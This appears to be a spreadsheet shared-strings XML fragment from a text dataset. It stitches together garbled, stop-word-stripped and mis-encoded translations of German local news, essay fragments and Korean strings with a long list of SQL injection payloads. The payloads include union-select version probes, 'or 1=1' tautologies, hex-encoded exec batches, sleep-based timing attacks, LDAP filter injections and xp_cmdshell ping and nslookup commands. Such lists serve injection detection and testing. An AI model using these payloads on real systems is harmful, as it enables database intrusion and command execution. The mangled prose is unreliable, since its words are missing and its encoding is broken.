    <t xml:space="preserve"> The Administrative Department Deutsche Bahn &amp;apos;s reconstruction plans investigated Breinlinger Engineering Office , doubts whether planned connection GeroltzhÃ¤user Weg straightforward </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</si>
  <si>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(ì£¼)ë‚˜ë¹ ìš”í•˜í•˜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</si>
  <si>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â€ No law sacred nature</t>
  </si>
  <si>
    <t xml:space="preserve"> Also involved project Chamber Industry Commerce Neubrandenburg German Hotel Restaurant Association (Deutsche Hotel- und GaststÃ¤tte , Dehoga) Mecklenburg-Western Pomerania </t>
  </si>
  <si>
    <t xml:space="preserve"> LÃ¶ffingen: KÃ¶pfler still candidate Information online: Although LÃ¶ffingen , small town Baar , 7,514 residents , described intact infrastructure , forward-looking school , youth senior citizens policies municipal energy companies , thus far no-one registered second mayoral candidate </t>
  </si>
  <si>
    <t xml:space="preserve"> HÃ¤uÃŸler made clear: &amp;quot; The final decisions made members Town Council &amp;quot;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</si>
  <si>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GÃ¶nningen Swabian Alb region </t>
  </si>
  <si>
    <t xml:space="preserve"> Maintenance day small &amp;apos; EnglÃ¤nderhÃ¼tte &amp;apos; For fifth maintenance day follow-up Natura 2000 project Upper Hotzenwald , group dedicated participants met small EnglÃ¤nderhÃ¼tte (Englishman &amp;apos;s Cottage) Ibach Following suggestions population , valley area cottage cleared , said Mayor Helmut Kaiser </t>
  </si>
  <si>
    <t xml:space="preserve"> The pupils BrÃ¤unlingen Primary School , taught well renovated old school building , new hall , soon able use old school yard well </t>
  </si>
  <si>
    <t>â€™ Rough graceless would greeting, truth handsomer affectation love</t>
  </si>
  <si>
    <t xml:space="preserve"> The local authorities sold former Kindergarten GartenstraÃŸe private buyer </t>
  </si>
  <si>
    <t xml:space="preserve"> This message 9th &amp;apos; Immobilientag &amp;apos; (Property Day) organised BÃ¶rsen Zeitung (stock exchange newspaper)</t>
  </si>
  <si>
    <t xml:space="preserve"> Persons seriously injured following collision Early Friday afternoon , two car drivers seriously injured head-on collision LandesstraÃŸe 44 (a rural road)</t>
  </si>
  <si>
    <t xml:space="preserve"> Last least , church eyes also turn last supper painting , painted Friedrich SchÃ¼z support Walter KrÃ¶ll Georg Halbritter </t>
  </si>
  <si>
    <t xml:space="preserve"> With dog Woody competing Class 1 competition , Susi HÃ¶pp subject critical scrutiny judge </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The goal protection many developed plots land possible , &amp;quot; said HÃ¤uÃŸler </t>
  </si>
  <si>
    <t xml:space="preserve">5million along Â£ 200,000 cash series raids </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; At least post boxes districts NeuschloÃŸ Rosengarten must still emptied Sundays , &amp;quot; said Bittner RÃ¶hrenbeck unison </t>
  </si>
  <si>
    <t xml:space="preserve"> In joint meeting Saturday , committees Haslach , Hofstetten , MÃ¼hlenbach , Fischerbach , Steinach Welschensteinach prepared changes </t>
  </si>
  <si>
    <t xml:space="preserve"> HÃ¤uÃŸler commented flood found Gechingen unprepared 15 May 2009 , decisive event raising question protective measures future </t>
  </si>
  <si>
    <t xml:space="preserve"> At 19: 00 , &amp;quot; birabÃ¶hmische &amp;quot; (a play words alluding regions pear trees , Bohemia , perhaps love beer well !) wind music group SchÃ¶mberg , provide great evening entertainment </t>
  </si>
  <si>
    <t>â€ I replied, â€œThey seem such; I Devilâ€™s child, I live Devil</t>
  </si>
  <si>
    <t xml:space="preserve"> The experience Theresa RÃ¼tten , head citizen &amp;apos;s Life Old Age service State Capital , also &amp;apos; majority old people Stuttgart want remain homes long possible &amp;apos; </t>
  </si>
  <si>
    <t xml:space="preserve"> Hans-Christian StrÃ¶bele , surprising meeting Snowden Russia addressed conditions former Secret Service employee would make statement German District Attorney investigation committee </t>
  </si>
  <si>
    <t xml:space="preserve"> At end , Parish Counsellor Michael SchÃ¶ner Steinach presented new logo pastoral care unit , agreed clear majority </t>
  </si>
  <si>
    <t xml:space="preserve"> They 32 men later jailed police seized heroin cocaine worth Â£ 1</t>
  </si>
  <si>
    <t xml:space="preserve"> The BÃ¼chner prizewinner known primarily writer prose , theatre texts something rarity </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The 100-year-old natural stone wall , serving foremost boundary old school yard - due renovated - Kirchstrasse , feature renovation cost plan town BrÃ¤unlingen </t>
  </si>
  <si>
    <t xml:space="preserve"> This pointed Christian Ulbrich , Jones Lang LaSalle CEO Europe , Near East Africa , 9th &amp;apos; Immobilientag &amp;apos; (Property Day) organised BÃ¶rsen Zeitung (stock exchange newspaper)</t>
  </si>
  <si>
    <t xml:space="preserve"> Charlie , founder &amp;quot; Lick Me I &amp;apos;m Delicious &amp;quot; ice cream company , said: &amp;quot; It incredible stuff still early days terms production , Â£ 200 gets 2g stuff </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Germany must wake , &amp;quot; says Oliver GrÃ¼n , president BITMi , represents small medium sized German IT companies </t>
  </si>
  <si>
    <t xml:space="preserve"> However , HÃ¤uÃŸler indicated guidelines canal systems different flood protection , must confused </t>
  </si>
  <si>
    <t>net í™ê¸¸ë™ yoda-master@hanmail</t>
  </si>
  <si>
    <t xml:space="preserve"> Every true man cause, country, age; requires infinite spaces numbers time fully accomplish design; â€” posterity seem follow steps train clients</t>
  </si>
  <si>
    <t xml:space="preserve"> TSV Freudenstadt I: Dominik BÃ¤uerle , Yannik BÃ¼chle , Sebastian DÃ¶lker , Felix PÃ¤lchen , Stefan RÃ¤ller , Simon Schenk Eduard Schulz </t>
  </si>
  <si>
    <t xml:space="preserve"> It easy world live worldâ€™s opinion; easy solitude live own; great man midst crowd keeps perfect sweetness independence solitude</t>
  </si>
  <si>
    <t>â€ â€œMan star; soul Render honest perfect man, Commands light, influence, fate; Nothing falls early late</t>
  </si>
  <si>
    <t xml:space="preserve"> Even stadium announcer , Norbert Dickel , speaking successful results recent days - derby victory , win Arsenal , contract extension coach JÃ¶rgen klopp - raise spirits </t>
  </si>
  <si>
    <t xml:space="preserve"> A man must consider blindmanâ€™s-buff game conformity</t>
  </si>
  <si>
    <t xml:space="preserve"> Schiltach &amp;apos;s town master mason , Roland GrieÃŸhaber , explained peculiarities &amp;quot; Am Hirschen &amp;quot; railway crossing Town Council </t>
  </si>
  <si>
    <t xml:space="preserve"> Already stamp duty take residential property boroughs Westminster Kensington &amp;amp; Chelsea , stood Â£ 708 million 2012 / 13 tax year , exceeds combined total Northern Ireland , Wales , Scotland , North East , North West Yorkshire Humber put together </t>
  </si>
  <si>
    <t xml:space="preserve"> In June government revised estimated cost building high-speed link London North England Â£ 32</t>
  </si>
  <si>
    <t xml:space="preserve"> Do I know beforehand possibly say new spontaneous word? Do I know that, ostentation examining grounds institution, thing? Do I know pledged look one side, â€” permitted side, man, parish minister? He retained attorney, airs bench emptiest affectation</t>
  </si>
  <si>
    <t xml:space="preserve"> Driver speeding 130mph hot drink legs fined Â£ 1,000 A motorist fined Â£ 1,000 driving 130mph (210km / h) hot drink balanced legs </t>
  </si>
  <si>
    <t xml:space="preserve"> The event organised community hall association , ski club &amp;quot; ZÃ¼ndkapsele &amp;quot; (blasting caps) tractor enthusiasts </t>
  </si>
  <si>
    <t xml:space="preserve"> So scoop costs around Â£ 140 </t>
  </si>
  <si>
    <t xml:space="preserve"> Scipio, Milton called â€œthe height Romeâ€; history resolves easily biography stout earnest persons</t>
  </si>
  <si>
    <t xml:space="preserve"> There mortifying experience particular, fail wreak also general history; I mean â€œthe foolish face praise,â€ forced smile put company feel ease answer conversation interest us</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</si>
  <si>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HÃ¤nde Unschuld waschen &amp;quot; (to wash one &amp;apos;s hands something)</t>
  </si>
  <si>
    <t xml:space="preserve"> On Sunday , Leinstetten Music Society entertain audiences morning session , BÃ¶ffingen Farmer &amp;apos;s Band guests 2: 00 p</t>
  </si>
  <si>
    <t xml:space="preserve"> Only post boxes front post office building Ernst-Ludwig-StraÃŸe 36 Jakob-MÃ¼ller-StraÃŸe 1 HÃ¼ttenfeld still emptied </t>
  </si>
  <si>
    <t xml:space="preserve"> Schmidt wish contact colleagues skirmish HÃ¼tter </t>
  </si>
  <si>
    <t xml:space="preserve"> In Town Parliament , RÃ¶hrenbeck asked whether Town Council planning discussions postal service regarding matter </t>
  </si>
  <si>
    <t xml:space="preserve"> Speak latent conviction, shall universal sense; inmost due time becomes outmost, â€” first thought rendered back us trumpets Last Judgment</t>
  </si>
  <si>
    <t xml:space="preserve"> As Managing Director municipal energy company , JÃ¶rg-Arne Bias , confirmed SÃœDKURIER , families four Pfullendorf receiving end price increase EUR 70 90 per year </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr StrÃ¶bele said , according former NSA contractor &amp;apos;s lawyer , Mr Snowden would able return Russia left </t>
  </si>
  <si>
    <t xml:space="preserve"> Snowden referred complex legal situation , StrÃ¶bele said ARD &amp;apos;s &amp;quot; Panorama &amp;quot; programme </t>
  </si>
  <si>
    <t xml:space="preserve"> So far , candidate succeed Mayor Norbert Brugger , longer running account age , 46-year-old banker business economist Dieter KÃ¶pfler LÃ¶ffingen </t>
  </si>
  <si>
    <t xml:space="preserve"> If authority impose requirements , town BrÃ¤unlingen would hope receive subsidies monument preservationists </t>
  </si>
  <si>
    <t xml:space="preserve"> For instance, English question sentences, ending question mark long-range dependent initial phrases (Lu Ng, 2010), â€œcould youâ€ Figure 1</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</si>
  <si>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ë‚œ ì§±ì´ë‹¤</t>
  </si>
  <si>
    <t xml:space="preserve"> Shortly SchÃ¤nzle roundabout noticed left-turn lane going direction StromeyersdorfstraÃŸe moved across right lane </t>
  </si>
  <si>
    <t xml:space="preserve"> Their works done apology extenuation living world, â€” invalids insane pay high board</t>
  </si>
  <si>
    <t xml:space="preserve"> In order achieve HQ 100aKlima protection , around four million â‚¬ must invested Gechingen , whereby town count State subsidy around 70 per cent </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr StrÃ¶bele , MP Germany &amp;apos;s Green party , published picture Mr Snowden Twitter feed </t>
  </si>
  <si>
    <t xml:space="preserve"> The by-standers look askance public street friendâ€™s parlour</t>
  </si>
  <si>
    <t xml:space="preserve"> Nevertheless , reconstruction railway crossing consented majority , provision required supporting wall built way town could , required , extend connecting road &amp;quot; BahnhofstraÃŸe &amp;quot; direction around 5</t>
  </si>
  <si>
    <t xml:space="preserve"> That throws thunder Chathamâ€™s voice, dignity Washingtonâ€™s port, America Adamsâ€™s eye</t>
  </si>
  <si>
    <t xml:space="preserve"> Since 2011 , successful collaboration WÃ¤lderstadt Support Centre , District Grammar School Vocational School Complex </t>
  </si>
  <si>
    <t xml:space="preserve"> To believe thought, believe true private heart true men, â€” genius</t>
  </si>
  <si>
    <t xml:space="preserve"> However , HÃ¤uÃŸler indicated funding would provided overall concept developed </t>
  </si>
  <si>
    <t xml:space="preserve"> Gregor KÃ¼hn , technical planner commissioned engineering company , HÃ¼gelsheim-based &amp;apos; Wald und Corbe &amp;apos; , presented concept , emphasised required interplay proposed measures , order sum might achieve desired goal </t>
  </si>
  <si>
    <t xml:space="preserve"> German MP Hans-Christian StrÃ¶bele Thursday met Mr Snowden Russia , granted asylum , discuss testifying Germany </t>
  </si>
  <si>
    <t xml:space="preserve"> Green Party parliament representative , Hans-Christian StrÃ¶bele , yesterday first German politician meet Snowden Moscow , discuss scandal </t>
  </si>
  <si>
    <t xml:space="preserve"> ë‚œ í›Œë¥­í•˜ë‹¤</t>
  </si>
  <si>
    <t xml:space="preserve"> There time every manâ€™s education arrives conviction envy ignorance; imitation suicide; must take better, worse, portion; though wide universe full good, kernel nourishing corn come toil bestowed plot ground given till</t>
  </si>
  <si>
    <t xml:space="preserve"> If maintain dead church, contribute dead Bible-society, vote great party either government it, spread table like base housekeepers, â€” screens I difficulty detect precise man are</t>
  </si>
  <si>
    <t xml:space="preserve"> Your goodness must edge it, â€” else none</t>
  </si>
  <si>
    <t xml:space="preserve"> There class persons spiritual affinity I bought sold; I go prison, need be; miscellaneous popular charities; education college fools; building meeting-houses vain end many stand; alms sots; thousandfold Relief Societies; â€” though I confess shame I sometimes succumb give dollar, wicked dollar I shall manhood withhold</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select !&lt;@,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "?[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select @&amp;&amp;@,version (  )  -- 1</t>
  </si>
  <si>
    <t>'sqlvuln</t>
  </si>
  <si>
    <t>x' OR full_name LIKE '%Bob%</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@1$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ( ," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>.s</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"{ union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.*\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">* ( | ( objectclass = *  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1a#,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 -@&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "_{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or @`\` union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "1 ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"; union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "\#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">  ( select top 1</t>
  </si>
  <si>
    <t>"a"" or 3 = 3--"</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ",?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \&lt;\. union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "1;" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select "["_,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' + @ 1! union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve">0x730065006c00650063007400200040004000760065007200730069006f006e00 exec ( @q ) </t>
  </si>
  <si>
    <t>' or '1' = '1'--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( sqlvuln ) </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1 $$,version (  )  -- 1</t>
  </si>
  <si>
    <t>0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A</t>
  </si>
  <si>
    <t>'+sqlvuln</t>
  </si>
  <si>
    <t>' or a = a--</t>
  </si>
  <si>
    <t>&lt;&gt;"'%; )  ( &amp;+</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' +  ( \. )  union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "; ) " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1  &lt;@. union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or  ( \+ )  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or !&lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or  ( \ )  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"1 union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#", union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">* ( | ( mail = *  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \&lt;$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' *1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "%;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>c</t>
  </si>
  <si>
    <t>hi' or 'a' = 'a</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or @#"{ = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \.&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"$ union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "%1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $+&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1&lt;@.,version (  )  -- 1</t>
  </si>
  <si>
    <t>' or 3 = 3</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "@#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 1 = 1 /*</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select @ $$,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> )  or  ( 'x' = 'x</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ".#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#" (  union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \.&lt;$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or @#" (  = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' &lt;@._ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>a' or 'a'  =  'a</t>
  </si>
  <si>
    <t>x' AND members.email IS NULL; --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or $&lt;\ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $ 1 = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>ns</t>
  </si>
  <si>
    <t>/**/or/**/1/**/ = /**/1</t>
  </si>
  <si>
    <t>t'exec master..xp_cmdshell 'nslookup www.googl ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' +  ( \ )  union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \&lt;1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ";&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1`\`,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"? = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ";." = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@.. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + @`\` union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEv</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \+&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + ( \ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>,s</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select ";"_,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "] ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ",&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>' or '' = '</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +  ( \. )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1'&lt;@$$ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' * ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 *$ . union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> ( sqlattempt2 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +$ . or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 %$ . or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ( ;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or a  =  a</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select +\,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +  ( $+ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>' or 1 --'</t>
  </si>
  <si>
    <t xml:space="preserve">declare @s varchar ( 200 )  select @s  =  0x77616974666F722064656C61792027303A303A31302700 exec ( @s )  </t>
  </si>
  <si>
    <t xml:space="preserve">|| ( elt ( -3+5,bin ( 15 ) ,ord ( 10 ) ,hex ( char ( 45  )  )    )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ";{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' &lt;@&amp;@ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.&lt;@$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or @ ( 1 )  = 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "@;" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>23 OR 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> union select</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"1 union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>or isNULL ( 1/0 )  /*</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \.&lt;$ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>x' AND 1 =  ( SELECT COUNT ( * )  FROM tabname ) ; --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ( _" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 % ( \ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or $&lt;\ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "1{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or a = a--</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or @#". = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>||'6</t>
  </si>
  <si>
    <t xml:space="preserve"> )  or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + \+%$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>; begin declare @var varchar ( 8000 )  set @var = ' ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or @#" (  = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \&lt;  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 % ( 1 )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">declare @q nvarchar  ( 200 )  0x730065006c00650063007400200040004000760065007200730069006f006e00 exec ( @q ) </t>
  </si>
  <si>
    <t>; exec master..xp_cmdshell 'ping 172.10.1.255'--</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or !&lt;@ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>or a  =  a</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + @&lt;1# union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1a,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +1&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ( 1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + @&lt;@# union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "@ ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.&amp;&amp;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">declare @q nvarchar  ( 4000 )  select @q  = </t>
  </si>
  <si>
    <t xml:space="preserve"> or 1 in  ( select @@version ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> or 'something'  =  'some'+'thing'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"$ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select \.%1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "?_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \&lt;$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>declare @s varchar  ( 8000 )  select @s  =  0x73656c65637420404076657273696f6e</t>
  </si>
  <si>
    <t xml:space="preserve"> or 0 = 0 --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1. &lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1 1$,version (  )  -- 1</t>
  </si>
  <si>
    <t>0x730065006c0065006300740020004000400076006500 ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"; union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ".{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sqlvuln</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or @#"{ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#". = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"1 union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or a = a</t>
  </si>
  <si>
    <t xml:space="preserve"> or '1' = '1'--</t>
  </si>
  <si>
    <t xml:space="preserve"> or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>' or 0 = 0 #</t>
  </si>
  <si>
    <t>or 0 = 0 --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"; union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or @ 1 = 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $ 1 = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> having 1 = 1--</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
